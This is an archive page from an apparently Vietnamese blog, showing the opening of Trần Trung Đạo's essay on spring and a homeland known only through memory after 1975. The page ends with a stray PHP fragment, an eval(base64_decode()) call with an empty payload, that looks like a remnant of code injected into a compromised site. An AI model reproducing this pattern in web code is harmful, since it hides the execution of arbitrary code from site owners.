Archive for January 17th, 2012

Trần Trung Đạo: Mùa xuân trên quê hương ngoài ký ức

Trần Trung Đạo: Mùa xuân trên quê hương ngoài ký ức

Mùa xuân trên quê hương ngoài ký ức Tháng Tư năm ngoái, trong một bài phỏng vấn của anh Duy Ái, đài VOA, tôi có trả lời “quê hương Việt Nam sau năm 1975 là quê hương để nhớ để thương chứ không phải để sống”. Thoạt nghe dễ

01.17.2012 | Ký-Truyện-Tùy Bút |

2 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>